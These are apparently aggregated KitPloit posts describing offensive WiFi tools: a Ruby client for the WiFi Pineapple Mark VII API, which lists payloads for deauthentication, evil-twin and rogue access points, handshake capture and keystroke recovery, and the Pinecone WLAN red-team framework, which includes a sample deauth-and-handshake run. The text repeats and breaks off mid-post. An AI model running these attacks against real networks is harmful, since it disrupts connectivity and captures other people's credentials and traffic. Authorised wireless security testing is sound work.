<p dir="auto">KitPloit - PenTest & Hacking Tools, 2023-09-04</p><h1 dir="auto">WiFi-Pineapple-MK7_REST-Client - WiFi Hacking Workflow With WiFi Pineapple Mark VII API</h1><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPsE196eB7FLv3EL6CvEzNMzLkFeNYmeeZHE7kOTzEUabOyYPS5JJ66Kxh3T00ffaH1W5uCH8DxkKnFib_uxlBJbWeYTi3xAGwE28klWQ9Guwzh8i6mQsEOupkQV-5VykrF9yK-s5Ip6zJ-UGOQOE1bk6_FKfIOxqRJZWo_zcKwSLTQo8t-Nd8NVjlIHzf/s794/wifi-pineapple.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="578" data-original-width="794" height="466" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPsE196eB7FLv3EL6CvEzNMzLkFeNYmeeZHE7kOTzEUabOyYPS5JJ66Kxh3T00ffaH1W5uCH8DxkKnFib_uxlBJbWeYTi3xAGwE28klWQ9Guwzh8i6mQsEOupkQV-5VykrF9yK-s5Ip6zJ-UGOQOE1bk6_FKfIOxqRJZWo_zcKwSLTQo8t-Nd8NVjlIHzf/w640-h466/wifi-pineapple.png" width="640" /></a></div><h1 dir="auto" tabindex="-1">PINEAPPLE MARK VII REST CLIENT</h1> <ul dir="auto"> <li>The leading rogue access point and WiFi <a href="https://www.kitploit.com/search/label/Pentest%20Toolkit" target="_blank" title="pentest toolkit">pentest toolkit</a> for close access operations.</li> <li>Passive and active attacks analyze <a href="https://www.kitploit.com/search/label/Vulnerable" target="_blank" title="vulnerable">vulnerable</a> and misconfigured devices.</li> <li><a href="https://hak5.org/collections/sale/products/wifi-pineapple" rel="nofollow" target="_blank" title="https://hak5.org/collections/sale/products/wifi-pineapple">https://hak5.org/collections/sale/products/wifi-pineapple</a></li> </ul> <blockquote> <p 
dir="auto"><strong>Author</strong>:: TW-D</p> <p dir="auto"><strong>Version</strong>:: 1.3.7</p> <p dir="auto"><strong>Copyright</strong>:: Copyright (c) 2022 TW-D</p> <p dir="auto"><strong>License</strong>:: Distributed under the same terms as Ruby</p> <p dir="auto"><strong>Doc</strong>:: <a href="https://hak5.github.io/mk7-docs/docs/rest/rest/" rel="nofollow" target="_blank" title="https://hak5.github.io/mk7-docs/docs/rest/rest/">https://hak5.github.io/mk7-docs/docs/rest/rest/</a></p> <p dir="auto"><strong>Requires</strong>:: Ruby >= 2.7.0p0 and <a href="https://www.kitploit.com/search/label/Pineapple" target="_blank" title="Pineapple">Pineapple</a> Mark VII >= 2.1.0-stable</p> <p dir="auto"><strong>Installation (Debian, Ubuntu, Raspbian)</strong>::</p> <ul dir="auto"> <li> <p dir="auto"><code>sudo apt-get install build-essential curl g++ ruby ruby-dev</code></p> </li> <li> <p dir="auto"><code>sudo gem install net-ssh rest-client tty-progressbar</code></p> </li> </ul> </blockquote> <h2 dir="auto" tabindex="-1">Description</h2> <p dir="auto">Library allowing the <a href="https://www.kitploit.com/search/label/Automation" target="_blank" title="automation">automation</a> of active or passive attack operations.</p> <p dir="auto"><strong>Note:</strong> <em>"Issues" and "Pull Requests" are welcome.</em></p> <h2 dir="auto" tabindex="-1">Payloads</h2> <p dir="auto">In the <em>"./payloads/"</em> directory, you will find:</p> <table> <tbody><tr> <th>COMMAND and CONTROL</th> <th>Author</th> <th>Usage</th> </tr> <tr> <td>Hak5 Key Croc - Real-time recovery of <a href="https://www.kitploit.com/search/label/Keystrokes" target="_blank" title="keystrokes">keystrokes</a> from a keyboard</td> <td>TW-D</td> <td>(edit) ruby ./hak5_key-croc.rb</td> </tr> <tr> <td>Maltronics WiFi Deauther - Spam beacon frames</td> <td>TW-D</td> <td>(edit) ruby ./maltronics_wifi-deauther.rb</td> </tr> </tbody></table> <table> <tbody><tr> <th>DEFENSE</th> <th>Author</th> 
<th>Usage</th> </tr> <tr> <td>Hak5 Pineapple Spotter</td> <td>TW-D with special thanks to <strong><a href="https://github.com/DrSKiZZ" rel="nofollow" target="_blank" title="@DrSKiZZ">@DrSKiZZ</a></strong>, <strong><a href="https://github.com/cribb-it" rel="nofollow" target="_blank" title="@cribb-it">@cribb-it</a></strong>, <strong><a href="https://github.com/barry99705" rel="nofollow" target="_blank" title="@barry99705">@barry99705</a></strong> and <strong><a href="https://codeberg.org/dark_pyrro" rel="nofollow" target="_blank" title="@dark_pyrro">@dark_pyrro</a></strong></td> <td>(edit) ruby ./hak5-pineapple_spotter.rb</td> </tr> </tbody></table> <table> <tbody><tr> <th>DoS</th> <th>Author</th> <th>Usage</th> </tr> <tr> <td>Deauthentication of clients available on the access points</td> <td>TW-D</td> <td>(edit) ruby ./deauthentication-clients.rb</td> </tr> </tbody></table> <table> <tbody><tr> <th>EXPLOITATION</th> <th>Author</th> <th>Usage</th> </tr> <tr> <td>Evil WPA Access Point</td> <td>TW-D</td> <td>(edit) ruby ./evil-wpa_access-point.rb</td> </tr> <tr> <td>Fake Access Points</td> <td>TW-D</td> <td>(edit) ruby ./fake_access-points.rb</td> </tr> <tr> <td>Mass Handshakes</td> <td>TW-D</td> <td>(edit) ruby ./mass-handshakes.rb</td> </tr> <tr> <td>Rogue Access Points</td> <td>TW-D</td> <td>(edit) ruby ./rogue_access-points.rb</td> </tr> <tr> <td>Twin Access Points</td> <td>TW-D</td> <td>(edit) ruby ./twin_access-points.rb</td> </tr> </tbody></table> <table> <tbody><tr> <th>GENERAL</th> <th>Author</th> <th>Usage</th> </tr> <tr> <td>System Status, Disk Usage, ...</td> <td>TW-D</td> <td>(edit) ruby ./dashboard-stats.rb</td> </tr> <tr> <td>Networking Interfaces</td> <td>TW-D</td> <td>(edit) ruby ./networking-interfaces.rb</td> </tr> <tr> <td>System Logs</td> <td>TW-D</td> <td>(edit) ruby ./system-logs.rb</td> </tr> </tbody></table> <table> <tbody><tr> <th>RECON</th> <th>Author</th> <th>Usage</th> </tr> <tr> <td>Access Points and Clients on 2.4GHz and 5GHz (with a 
supported adapter)</td> <td>TW-D</td> <td>(edit) ruby ./access-points_clients_5ghz.rb</td> </tr> <tr> <td>Access Points and Clients</td> <td>TW-D</td> <td>(edit) ruby ./access-points_clients.rb</td> </tr> <tr> <td>MAC Addresses of Access Points</td> <td>TW-D</td> <td>(edit) ruby ./access-points_mac-addresses.rb</td> </tr> <tr> <td>Tagged Parameters of Access Points</td> <td>TW-D</td> <td>(edit) ruby ./access-points_tagged-parameters.rb</td> </tr> <tr> <td>Access Points and Wireless Network Mapping with WiGLE</td> <td>TW-D</td> <td>(edit) ruby ./access-points_wigle.rb</td> </tr> <tr> <td>MAC Addresses of Clients</td> <td>TW-D</td> <td>(edit) ruby ./clients_mac-addresses.rb</td> </tr> <tr> <td>OPEN Access Points</td> <td>TW-D</td> <td>(edit) ruby ./open_access-points.rb</td> </tr> <tr> <td>WEP Access Points</td> <td>TW-D</td> <td>(edit) ruby ./wep_access-points.rb</td> </tr> <tr> <td>WPA Access Points</td> <td>TW-D</td> <td>(edit) ruby ./wpa_access-points.rb</td> </tr> <tr> <td>WPA2 Access Points</td> <td>TW-D</td> <td>(edit) ruby ./wpa2_access-points.rb</td> </tr> <tr> <td>WPA3 Access Points</td> <td>TW-D</td> <td>(edit) ruby ./wpa3_access-points.rb</td> </tr> </tbody></table> <table> <tbody><tr> <th>WARDRIVING</th> <th>Author</th> <th>Usage</th> </tr> <tr> <td>Continuous Recon on 2.4GHz and 5GHz (with a supported adapter)</td> <td>TW-D</td> <td>(edit) ruby ./continuous-recon_5ghz.rb [CTRL+c]</td> </tr> <tr> <td>Continuous Recon for Handshakes Capture</td> <td>TW-D</td> <td>(edit) ruby ./continuous-recon_handshakes.rb [CTRL+c]</td> </tr> <tr> <td>Continuous Recon</td> <td>TW-D</td> <td>(edit) ruby ./continuous-recon.rb [CTRL+c]</td> </tr> </tbody></table> <h2 dir="auto" tabindex="-1">Payload skeleton for development</h2> <div class="highlight highlight-source-ruby notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="# # Title: <TITLE> # # Description: <DESCRIPTION> # # # Author: <AUTHOR> # Version: <VERSION> # Category: <CATEGORY> # # 
STATUS # ====================== # <SHORT-DESCRIPTION> ... SETUP # <SHORT-DESCRIPTION> ... ATTACK # <SHORT-DESCRIPTION> ... SPECIAL # <SHORT-DESCRIPTION> ... FINISH # <SHORT-DESCRIPTION> ... CLEANUP # <SHORT-DESCRIPTION> ... OFF # require_relative('<PATH-TO>/classes/PineappleMK7.rb') system_authentication = PineappleMK7::System::Authentication.new system_authentication.host = "<PINEAPPLE-IP-ADDRESS>" system_authentication.port = 1471 system_authentication.mac = "<PINEAPPLE-MAC-ADDRESS>" system_authentication.password = "<ROOT-ACCOUNT-PASSWORD>" if (system_authentication.login) led = PineappleMK7::System::LED.new # SETUP # led.setup # # [...] # # ATTACK # led.attack # # [...] # # SPECIAL # led.special # # [...] # # FINISH # led.finish # # [...] # # CLEANUP # led.cleanup # # [...] # # OFF # led.off end" dir="auto"><pre><code>#<br /># Title: <TITLE><br />#<br /># Description: <DESCRIPTION><br />#<br />#<br /># Author: <AUTHOR><br /># Version: <VERSION><br /># Category: <CATEGORY><br />#<br /># STATUS<br /># ======================<br /># <SHORT-DESCRIPTION> ... SETUP<br /># <SHORT-DESCRIPTION> ... ATTACK<br /># <SHORT-DESCRIPTION> ... SPECIAL<br /># <SHORT-DESCRIPTION> ... FINISH<br /># <SHORT-DESCRIPTION> ... CLEANUP<br /># <SHORT-DESCRIPTION> ... 
OFF<br />#<br /><br />require_relative('<PATH-TO>/classes/PineappleMK7.rb')<br /><br />system_authentication = PineappleMK7::System::Authentication.new<br />system_authentication.host = "<PINEAPPLE-IP-ADDRESS>"<br />system_authentication.port = 1471<br />system_authentication.mac = "<PINEAPPLE-MAC-ADDRESS>"<br />system_authentication.password = "<ROOT-ACCOUNT-PASSWORD>"<br /><br />if (system_authentication.login)<br /><br /> led = PineappleMK7::System::LED.new<br /><br /> # SETUP<br /> #<br /> led.setup<br /><br /> #<br /> # [...]<br /> #<br /><br /> # ATTACK<br /> #<br /> led.attack<br /><br /> #<br /> # [...]<br /> #<br /><br /> # SPECIAL<br /> #<br /> led.special<br /><br /> #<br /> # [...]<br /> #<br /><br /> # FINISH<br /> #<br /> led.finish<br /><br /> #<br /> # [...]<br /> #<br /><br /> # CLEANUP<br /> #<br /> led.cleanup<br /><br /> #<br /> # [...]<br /> #<br /><br /> # OFF<br /> #<br /> led.off<br /><br />end</code></pre></div> <p dir="auto"><strong>Note :</strong> <em>Don't hesitate to take inspiration from the payloads directory.</em></p> <h2 dir="auto" tabindex="-1">System modules</h2> <h3 dir="auto" tabindex="-1">Authentication accessors/method</h3> <div class="highlight highlight-source-ruby notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="system_authentication = PineappleMK7::System::Authentication.new system_authentication.host = (string) "<PINEAPPLE-IP-ADDRESS>" system_authentication.port = (integer) 1471 system_authentication.mac = (string) "<PINEAPPLE-MAC-ADDRESS>" system_authentication.password = (string) "<ROOT-ACCOUNT-PASSWORD>" system_authentication.login()" dir="auto"><pre><code>system_authentication = PineappleMK7::System::Authentication.new<br /><br />system_authentication.host = (string) "<PINEAPPLE-IP-ADDRESS>"<br />system_authentication.port = (integer) 1471<br />system_authentication.mac = (string) "<PINEAPPLE-MAC-ADDRESS>"<br />system_authentication.password = (string) "<ROOT-ACCOUNT-PASSWORD>"<br 
/><br />system_authentication.login()</code></pre></div> <h3 dir="auto" tabindex="-1">LED methods</h3> <div class="highlight highlight-source-ruby notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="led = PineappleMK7::System::LED.new led.setup() led.failed() led.attack() led.special() led.cleanup() led.finish() led.off()" dir="auto"><pre><code>led = PineappleMK7::System::LED.new<br /><br />led.setup()<br />led.failed()<br />led.attack()<br />led.special()<br />led.cleanup()<br />led.finish()<br />led.off()</code></pre></div> <h2 dir="auto" tabindex="-1">Pineapple Modules</h2> <h3 dir="auto" tabindex="-1">Dashboard</h3> <h4 dir="auto" tabindex="-1">Notifications method</h4> <div class="highlight highlight-source-ruby notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="dashboard_notifications = PineappleMK7::Modules::Dashboard::Notifications.new dashboard_notifications.clear()" dir="auto"><pre><code>dashboard_notifications = PineappleMK7::Modules::Dashboard::Notifications.new<br /><br />dashboard_notifications.clear()</code></pre></div> <h4 dir="auto" tabindex="-1">Stats method</h4> <div class="highlight highlight-source-ruby notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="dashboard_stats = PineappleMK7::Modules::Dashboard::Stats.new dashboard_stats.output()" dir="auto"><pre><code>dashboard_stats = PineappleMK7::Modules::Dashboard::Stats.new<br /><br />dashboard_stats.output()</code></pre></div> <h3 dir="auto" tabindex="-1">Logging</h3> <h4 dir="auto" tabindex="-1">System method</h4> <div class="highlight highlight-source-ruby notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="logging_system = PineappleMK7::Modules::Logging::System.new logging_system.output()" dir="auto"><pre><code>logging_system = PineappleMK7::Modules::Logging::System.new<br /><br />logging_system.output()</code></pre></div> <h3 dir="auto" tabindex="-1">PineAP</h3> <h4 
dir="auto" tabindex="-1">Clients methods</h4> <div class="highlight highlight-source-ruby notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="pineap_clients = PineappleMK7::Modules::PineAP::Clients.new pineap_clients.connected_clients() pineap_clients.previous_clients() pineap_clients.kick( (string) mac ) pineap_clients.clear_previous()" dir="auto"><pre><code>pineap_clients = PineappleMK7::Modules::PineAP::Clients.new<br /><br />pineap_clients.connected_clients()<br />pineap_clients.previous_clients()<br />pineap_clients.kick( (string) mac )<br />pineap_clients.clear_previous()</code></pre></div> <h4 dir="auto" tabindex="-1">EvilWPA accessors/method</h4> <div class="highlight highlight-source-ruby notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="evil_wpa = PineappleMK7::Modules::PineAP::EvilWPA.new evil_wpa.ssid = (string default:'PineAP_WPA') evil_wpa.bssid = (string default:'00:13:37:BE:EF:00') evil_wpa.auth = (string default:'psk2+ccmp') evil_wpa.password = (string default:'pineapplesareyummy') evil_wpa.hidden = (boolean default:false) evil_wpa.enabled = (boolean default:false) evil_wpa.capture_handshakes = (boolean default:false) evil_wpa.save()" dir="auto"><pre><code>evil_wpa = PineappleMK7::Modules::PineAP::EvilWPA.new<br /><br />evil_wpa.ssid = (string default:'PineAP_WPA')<br />evil_wpa.bssid = (string default:'00:13:37:BE:EF:00')<br />evil_wpa.auth = (string default:'psk2+ccmp')<br />evil_wpa.password = (string default:'pineapplesareyummy')<br />evil_wpa.hidden = (boolean default:false)<br />evil_wpa.enabled = (boolean default:false)<br />evil_wpa.capture_handshakes = (boolean default:false)<br /><br />evil_wpa.save()</code></pre></div> <h4 dir="auto" tabindex="-1">Filtering methods</h4> <div class="highlight highlight-source-ruby notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="pineap_filtering = PineappleMK7::Modules::PineAP::Filtering.new 
pineap_filtering.client_filter( (string) 'allow' | 'deny' ) pineap_filtering.add_client( (string) mac ) pineap_filtering.clear_clients() pineap_filtering.ssid_filter( (string) 'allow' | 'deny' )" dir="auto"><pre><code>pineap_filtering = PineappleMK7::Modules::PineAP::Filtering.new<br /><br />pineap_filtering.client_filter( (string) 'allow' | 'deny' )<br />pineap_filtering.add_client( (string) mac )<br />pineap_filtering.clear_clients()<br />pineap_filtering.ssid_filter( (string) 'allow' | 'deny' )</code></pre></div> <h4 dir="auto" tabindex="-1">Impersonation methods</h4> <div class="highlight highlight-source-ruby notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="pineap_impersonation = PineappleMK7::Modules::PineAP::Impersonation.new pineap_impersonation.output() pineap_impersonation.add_ssid( (string) ssid ) pineap_impersonation.clear_pool()" dir="auto"><pre><code>pineap_impersonation = PineappleMK7::Modules::PineAP::Impersonation.new<br /><br />pineap_impersonation.output()<br />pineap_impersonation.add_ssid( (string) ssid )<br />pineap_impersonation.clear_pool()</code></pre></div> <h4 dir="auto" tabindex="-1">OpenAP method</h4> <div class="highlight highlight-source-ruby notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="open_ap = PineappleMK7::Modules::PineAP::OpenAP.new open_ap.output()" dir="auto"><pre><code>open_ap = PineappleMK7::Modules::PineAP::OpenAP.new<br /><br />open_ap.output()</code></pre></div> <h4 dir="auto" tabindex="-1">Settings accessors/method</h4> <div class="highlight highlight-source-ruby notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="pineap_settings = PineappleMK7::Modules::PineAP::Settings.new pineap_settings.enablePineAP = (boolean default:true) pineap_settings.autostartPineAP = (boolean default:true) pineap_settings.armedPineAP = (boolean default:false) pineap_settings.ap_channel = (string default:'11') pineap_settings.karma = (boolean 
default:false) pineap_settings.logging = (boolean default:false) pineap_settings.connect_notifications = (boolean default:false) pineap_settings.disconnect_notifications = (boolean default:false) pineap_settings.capture_ssids = (boolean default:false) pineap_settings.beacon_responses = (boolean default:false) pineap_settings.broadcast_ssid_pool = (boolean default:false) pineap_settings.broadcast_ssid_pool_random = (boolean default:false) pineap_settings.pineap_mac = (string default:system_authentication.mac) pineap_settings.target_mac = (string default:'FF:FF:FF:FF:FF:FF') pineap_settings.beacon_response_interval = (string default:'NORMAL') pineap_settings.beacon_interval = (string default:'NORMAL') pineap_settings.save()" dir="auto"><pre><code>pineap_settings = PineappleMK7::Modules::PineAP::Settings.new<br /><br />pineap_settings.enablePineAP = (boolean default:true)<br />pineap_settings.autostartPineAP = (boolean default:true)<br />pineap_settings.armedPineAP = (boolean default:false)<br />pineap_settings.ap_channel = (string default:'11')<br />pineap_settings.karma = (boolean default:false)<br />pineap_settings.logging = (boolean default:false)<br />pineap_settings.connect_notifications = (boolean default:false)<br />pineap_settings.disconnect_notifications = (boolean default:false)<br />pineap_settings.capture_ssids = (boolean default:false)<br />pineap_settings.beacon_responses = (boolean default:false)<br />pineap_settings.broadcast_ssid_pool = (boolean default:false)<br />pineap_settings.broadcast_ssid_pool_random = (boolean default:false)<br />pineap_settings.pineap_mac = (string default:system_authentication.mac)<br />pineap_settings.target_mac = (string default:'FF:FF:FF:FF:FF:FF')<br />pineap_settings.beacon_response_interval = (string default:'NORMAL')<br />pineap_settings.beacon_interval = (string default:'NORMAL')<br /><br />pineap_settings.save()</code></pre></div> <h3 dir="auto" tabindex="-1">Recon</h3> <h4 dir="auto" tabindex="-1">Handshakes 
methods</h4> <div class="highlight highlight-source-ruby notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="recon_handshakes = PineappleMK7::Modules::Recon::Handshakes.new recon_handshakes.start( (object) ap ) recon_handshakes.stop() recon_handshakes.output() recon_handshakes.download( (object) handshake, (string) destination ) recon_handshakes.clear()" dir="auto"><pre><code>recon_handshakes = PineappleMK7::Modules::Recon::Handshakes.new<br /><br />recon_handshakes.start( (object) ap )<br />recon_handshakes.stop()<br />recon_handshakes.output()<br />recon_handshakes.download( (object) handshake, (string) destination )<br />recon_handshakes.clear()</code></pre></div> <h4 dir="auto" tabindex="-1">Scanning methods</h4> <div class="highlight highlight-source-ruby notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="recon_scanning = PineappleMK7::Modules::Recon::Scanning.new recon_scanning.start( (integer) scan_time ) recon_scanning.start_continuous( (boolean) autoHandshake ) recon_scanning.stop_continuous() recon_scanning.output( (integer) scanID ) recon_scanning.tags( (object) ap ) recon_scanning.deauth_ap( (object) ap ) recon_scanning.delete( (integer) scanID )" dir="auto"><pre><code>recon_scanning = PineappleMK7::Modules::Recon::Scanning.new<br /><br />recon_scanning.start( (integer) scan_time )<br />recon_scanning.start_continuous( (boolean) autoHandshake )<br />recon_scanning.stop_continuous()<br />recon_scanning.output( (integer) scanID )<br />recon_scanning.tags( (object) ap )<br />recon_scanning.deauth_ap( (object) ap )<br />recon_scanning.delete( (integer) scanID )</code></pre></div> <h3 dir="auto" tabindex="-1">Settings</h3> <h4 dir="auto" tabindex="-1">Networking methods</h4> <div class="highlight highlight-source-ruby notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="settings_networking = PineappleMK7::Modules::Settings::Networking.new 
settings_networking.interfaces() settings_networking.client_scan( (string) interface ) settings_networking.client_connect( (object) network, (string) interface ) settings_networking.client_disconnect( (string) interface ) settings_networking.recon_interface( (string) interface )" dir="auto"><pre><code>settings_networking = PineappleMK7::Modules::Settings::Networking.new<br /><br />settings_networking.interfaces()<br />settings_networking.client_scan( (string) interface )<br />settings_networking.client_connect( (object) network, (string) interface )<br />settings_networking.client_disconnect( (string) interface )<br />settings_networking.recon_interface( (string) interface )</code></pre></div> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/TW-D/WiFi-Pineapple-MK7_REST-Client" rel="nofollow" target="_blank" title="Download WiFi-Pineapple-MK7_REST-Client">Download WiFi-Pineapple-MK7_REST-Client</a></span></b></div>
<p dir="auto">KitPloit - PenTest & Hacking Tools, 2022-09-13</p><h1 dir="auto">Pinecone - A WLAN Red Team Framework</h1><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVprK5Si6fyKHJ3C1kKW7ZAgIrXIVRKpUQyF6sfn_ErcUUh-cnAXXtviqxEUBOj9Hi_plCXJN6WRPGWeLMNbfalbK350h2rqlk9zJc23vAaeUKIfxYu_F0NjXNX05aYzaERt7pJWPRbyBBdrK3RZf8zRHrjUDRYkK5D_2tyniApSvsyrhd-UCHShW-KA/s866/pinecone_1_logo_full.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="450" data-original-width="866" height="332" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVprK5Si6fyKHJ3C1kKW7ZAgIrXIVRKpUQyF6sfn_ErcUUh-cnAXXtviqxEUBOj9Hi_plCXJN6WRPGWeLMNbfalbK350h2rqlk9zJc23vAaeUKIfxYu_F0NjXNX05aYzaERt7pJWPRbyBBdrK3RZf8zRHrjUDRYkK5D_2tyniApSvsyrhd-UCHShW-KA/w640-h332/pinecone_1_logo_full.png" width="640" /></a></div>
<p dir="auto">Pinecone is a WLAN network auditing tool suitable for red team use. It is extensible via modules and is designed to run on Debian-based operating systems. Pinecone is particularly oriented toward use with a Raspberry Pi as a portable <a href="https://www.kitploit.com/search/label/Wireless%20Auditing" target="_blank" title="wireless auditing">wireless auditing</a> box.</p>
<p dir="auto">This tool is designed for educational and research purposes only. Only use it with explicit permission.</p>
<h2 dir="auto">Installation</h2>
<p dir="auto">To run Pinecone, you need a Debian-based operating system (it has been tested on Raspbian, <a href="https://www.kitploit.com/search/label/Raspberry%20Pi" target="_blank" title="Raspberry Pi">Raspberry Pi</a> Desktop and Kali Linux). Pinecone has the following requirements:</p>
<ul dir="auto">
<li><strong>Python 3.5+</strong>. Your distribution probably comes with Python 3 already installed; if not, it can be installed using <code>apt-get install python3</code>.</li>
<li><strong>dnsmasq</strong> (tested with version 2.76). Can be installed using <code>apt-get install dnsmasq</code>.</li>
<li><strong>hostapd-wpe</strong> (tested with version 2.6). Can be installed using <code>apt-get install hostapd-wpe</code>. If your distribution repository does not have a hostapd-wpe package, you can either try to install it using a <a href="https://http.kali.org/pool/main/h/hostapd-wpe" rel="nofollow" target="_blank" title="Kali Linux repository pre-compiled package">Kali Linux repository pre-compiled package</a>, or <a href="https://github.com/aircrack-ng/aircrack-ng/tree/master/patches/wpe/hostapd-wpe" rel="nofollow" target="_blank" title="compile it from its source code">compile it from its source code</a>.</li>
</ul>
<p dir="auto">After installing the necessary packages, install the Python package <a href="https://www.kitploit.com/search/label/Requirements" target="_blank" title="requirements">requirements</a> for Pinecone with <code>pip3 install -r requirements.txt</code> in the project root folder.</p>
<h2 dir="auto">Usage</h2>
<p dir="auto">To start Pinecone, execute <code>python3 pinecone.py</code> from within the project root folder:</p>
<div><pre><code>root@kali:~/pinecone# python pinecone.py <br />[i] Database file: ~/pinecone/db/database.sqlite<br />pinecone > <br /></code></pre></div>
<p dir="auto">Pinecone is controlled via a Metasploit-like command-line interface. You can type <code>help</code> to get the list of available commands, or <code>help 'command'</code> to get more information about a specific command:</p>
<div><pre><code>pinecone > help<br /><br />Documented commands (type help <topic>):<br />========================================<br />alias help load pyscript set shortcuts use<br />edit history py quit shell unalias <br /><br />Undocumented commands:<br />======================<br />back run stop<br /><br />pinecone > help use<br />Usage: use module [-h]<br /><br />Interact with the specified module.<br /><br />positional arguments:<br /> module module ID<br /><br />optional arguments:<br /> -h, --help show this help message and exit<br /></code></pre></div>
<p dir="auto">Use the command <code>use 'moduleID'</code> to activate a Pinecone module. You can use Tab auto-completion to see the list of currently loaded modules:</p>
<div><pre><code>pinecone > use <br />attack/deauth daemon/hostapd-wpe report/db2json scripts/infrastructure/ap <br />daemon/dnsmasq discovery/recon scripts/attack/wpa_handshake<br />pinecone > use discovery/recon <br />pcn module(discovery/recon) > <br /></code></pre></div>
<p dir="auto">Every module has options, which can be seen by typing <code>help run</code> or <code>run --help</code> while the module is activated. Most modules have default values for their options (check them before running):</p>
<div><pre><code>pcn module(discovery/recon) > help run<br />usage: run [-h] [-i INTERFACE]<br /><br />optional arguments:<br /> -h, --help show this help message and exit<br /> -i INTERFACE, --iface INTERFACE<br /> monitor mode capable WLAN interface (default: wlan0)<br /></code></pre></div>
<p dir="auto">When a module is activated, use the <code>run [options...]</code> command to start it. Modules report their execution state as they run:</p>
<div><pre><code>pcn script(attack/wpa_handshake) > run -s TEST_SSID<br />[i] Sending 64 deauth frames to all clients from AP 00:11:22:33:44:55 on channel 1...<br />................................................................<br />Sent 64 packets.<br />[i] Monitoring for 10 secs on channel 1 WPA handshakes between all clients and AP 00:11:22:33:44:55...<br /></code></pre></div>
<p dir="auto">If a module runs in the background (for example, <em>scripts/infrastructure/ap</em>), you can stop it with the <code>stop</code> command while it is running.</p>
<div>When you are done using a module, you can deactivate it by using the <code>back</code> command. You can also activate another module issuing the <code>use</code> command again.
<p dir="auto">Shell commands may be executed with the command <code>shell</code> or the <code>!</code> shortcut:</p>
<div><pre><code>pinecone > !ls<br />LICENSE modules module_template.py pinecone pinecone.py README.md requirements.txt TODO.md<br /></code></pre></div>
<p dir="auto">Currently, Pinecone <a href="https://www.kitploit.com/search/label/Reconnaissance" target="_blank" title="reconnaissance">reconnaissance</a> SQLite database is stored in the <em>db/</em> directory inside the project root folder. All the temporary files that Pinecone needs to use are stored in the <em>tmp/</em> directory also under the project root folder.</p>
<br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/pinecone-wifi/pinecone" rel="nofollow" target="_blank" title="Download Pinecone">Download Pinecone</a></span></b></div></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-42680338602121854312022-07-19T08:30:00.004-04:002022-07-19T08:30:00.258-04:00Pinecone - A WLAN Red Team Framework<p align="center" dir="auto"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhAPOxXYnzFFgRMTwiCbMNj4SS18g7ZIMnLjqPun-s45Hvu5DTLDJxEtcUFlikNsDNJNaJGmoNqs2DlIfFM_FIt6KKyacffQZeIOop8JMJ9LZeWeuQ_QncAZJWzvlsfKvXqvCzXwJCzgLlDFK05g_avNJPGmVvdM-q0cyTmRArEqE4aKgoP_4RsSJnF"><img alt="" border="0" height="332" id="BLOGGER_PHOTO_ID_7119743612226995154" src="https://blogger.googleusercontent.com/img/a/AVvXsEhAPOxXYnzFFgRMTwiCbMNj4SS18g7ZIMnLjqPun-s45Hvu5DTLDJxEtcUFlikNsDNJNaJGmoNqs2DlIfFM_FIt6KKyacffQZeIOop8JMJ9LZeWeuQ_QncAZJWzvlsfKvXqvCzXwJCzgLlDFK05g_avNJPGmVvdM-q0cyTmRArEqE4aKgoP_4RsSJnF=w640-h332" width="640" /></a> </p> <p dir="auto"><br /></p><p dir="auto">Pinecone is a WLAN networks auditing tool, suitable for red team usage. It is extensible via modules, and it is designed to be run in Debian-based operating systems. Pinecone is specially oriented to be used with a Raspberry Pi, as a portable <a href="https://www.kitploit.com/search/label/Wireless%20Auditing" target="_blank" title="wireless auditing">wireless auditing</a> box.</p> <p dir="auto">This tool is designed for educational and research purposes only. Only use it with explicit permission.</p><span><a name='more'></a></span><p dir="auto"><br /></p> <h2 dir="auto">Installation</h2> <p dir="auto">For running Pinecone, you need a Debian-based operating system (it has been tested on Raspbian, <a href="https://www.kitploit.com/search/label/Raspberry%20Pi" target="_blank" title="Raspberry Pi">Raspberry Pi</a> Desktop and Kali Linux). 
Pinecone has the following requirements:</p> <ul dir="auto"> <li><strong>Python 3.5+</strong>. Your distribution probably comes with Python3 already installed, if not it can be installed using <code>apt-get install python3</code>.</li> <li><strong>dnsmasq</strong> (tested with version 2.76). Can be installed using <code>apt-get install dnsmasq</code>.</li> <li><strong>hostapd-wpe</strong> (tested with version 2.6). Can be installed using <code>apt-get install hostapd-wpe</code>. If your distribution repository does not have a hostapd-wpe package, you can either try to install it using a <a href="https://http.kali.org/pool/main/h/hostapd-wpe" rel="nofollow" target="_blank" title="Kali Linux repository pre-compiled package">Kali Linux repository pre-compiled package</a>, or <a href="https://github.com/aircrack-ng/aircrack-ng/tree/master/patches/wpe/hostapd-wpe" rel="nofollow" target="_blank" title="compile it from its source code">compile it from its source code</a>.</li> </ul> <p dir="auto">After installing the necessary packages, you can install the Python packages <a href="https://www.kitploit.com/search/label/Requirements" target="_blank" title="requirements">requirements</a> for Pinecone using <code>pip3 install -r requirements.txt</code> in the project root folder.</p> <h2 dir="auto">Usage</h2> <p dir="auto">For starting 